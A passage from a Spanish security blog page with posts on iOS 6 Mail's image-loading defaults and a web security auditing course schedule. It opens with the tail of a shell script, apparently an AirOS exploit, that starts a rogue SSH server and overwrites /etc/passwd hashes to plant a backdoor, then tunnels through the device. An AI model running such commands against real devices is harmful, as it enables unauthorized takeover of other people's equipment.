runcmd "[[ -e /var/sshd/lol.rsa ]] || ./dropbearkey -t rsa -f /var/sshd/lol.rsa" >>/tmp/airos.log

runcmd "./dropbear -b /var/sshd/motd -r /var/sshd/lol.rsa;" >>/tmp/airos.log

runcmd 'sed -i -e "s/:[^:]*:/:$1$.et5JTtj$6U9j6CSf7g3lNfhFenOX11:/" /etc/passwd;cat /etc/passwd'

echo -en "| >>user: "
read usr
[[ -z "$usr" ]] && usr=admin

if [[ "$c" = 2 ]]; then
        ssh -C "$usr@$host"
else
        ssh -g -L "0.0.0.0:$portlocal:$hostfinal:$portfinal" "$usr@$host"
fi
</pre>






lunes, 8 de octubre de 2012

iOS 6 Mail arregla el "problema" de las imágenes

Hace ya un tiempo me lo pasé genial jugando con la configuración del cliente Mail de iPhone al que le achacaba varias cosas en la configuración insegura por defecto, como que: 
1) No se pueda ver el código fuente del mensaje de correo
2) Por defecto cargue las imágenes de los mensajes
3) Que no se pueda seleccionar caso a caso en qué mensajes verlas
Esto me llevó a escribir unos posts en los que jugaba con estas opciones, tales como "El jefe hackeó la base de datos o cómo liarla poniendo un iPad/iPhone para leer el correo corporativo de la empresa", "Colecciona amigos con iPad (e iPhone) y gana votaciones" y "Cómo hacer click-fraud y ganar pasta con la publicidad de tu web y tu red de amigos con iPad/iPhone", que el libro del Fraude Online enseña muchos trucos. La verdad es que me divertí mucho esos días, a pesar de que tuve que discutir con algunos "fanboys" que lo veían todo perfecto y recalcárselo varias veces.

Figura 1: Mis quejas en Abril de 2011

Al final, parece que los que trabajan en seguridad en Apple han tomado nota en iOS 6, ya que para el cliente de correo, además de solucionar un bug de Ángel Prado, viene la carga de imágenes capada por defecto en todos los mensajes de correo electrónico que se lean vía Mail, lo que ayuda a que los usuarios menos informados en seguridad caigan en este tipo de ataques.

Figura 2: Carga de imágenes desactivada por defecto en Mail de iOS 6
Pero lo que es mejor, ahora si con la carga de imágenes bloqueada llega un mensaje de correo electrónico con imagenes incrustadas, te deja seleccionar si quieres cargarlas para ese mensaje en concreto y solo para ese, sin necesidad de cambiar la configuración global.
Figura 3: Opción de cargar las imágenes mensaje por mensaje
Muy bien, por fin el cliente Mail de iOS 6 tiene estas opciones de seguridad que hace alrededor de una década tienen todos los clientes de correo electrónico. Aún me queda eso de ver el código fuente del mensaje - para los que necesitamos ver esas cosas - y si pueden arreglar lo del parlanchín USER-Agent de iOS, mejor que mejor.
 
 

domingo, 7 de octubre de 2012

Curso Online de Auditoria y Seguridad Web

A partir del próximo día 16 de Octubre dará comienzo un Curso Online de Auditoría y Seguridad Web compuesto de 20 seminarios online de dos horas de duración cada uno, que se harán en horario de 16:00 a 18:00 - hora local en Madrid (España) -, y tendrá lugar todos los martes, miércoles y jueves hasta el día 29 de noviembre de 2012.  El curso lo vamos a impartir desde Informática 64 y este es el calendario y temáticas que abarca esta formación:

Octubre de 2012
16/10: Introducción a la auditoría Informática
17/10: Google Hacking y Shodan Hacking
18/10: Metadata Security
23/10: Fuzzing y Crawling
24/10: Análisis de capa de seguridad SSL
25/10: Auditoría a un CMS
30/10: Exploiting con Metasploit
31/10: Post-Explotación con Metasploit 
Noviembre de 2012
06/11: Herramientas de Metasploit
07/11: Cross-Site Scripting (XSS)
08/11: Cookie Spoofing e Hijacking
13/11: SQL Injection: Manual
14/11: SQL Injection: Automático
15/11: LFI/RFI/RFD
20/11: Clickjacking, Full Path Disclosure y contramedidas
21/11: (Blind) LDAP Injection/XPATH Injection y CSPP
22/11: Fortificación de IIS
27/11: Fortificación de servidor Apache, PHP y Análisis de código I
28/11: Fortificación de servidor Apache, PHP y Análisis de código II
29/11: Fortificación de servidor Apache: Mod_Security
A esta formación te puedes apuntar en solitario, en un grupo hasta de 5 personas y a un único seminario, es decir, no pagar el curso entero sino sólo el seminario que quieras hacer. En el siguiente enlace podrás ver con más detalle toda la información relacionada con esta formación: Curso Online de Auditoría y Seguridad Web

A parte de esta formación, esa semana también está el Curso Avanzado de Desarrollo de Aplicaciones iOS para iPhone & iPad en Madrid, y a finales de mes tenemos el Asegúr@IT Camp 4, donde nos lo vamos a pasar genial }:))

Saludos Malignos!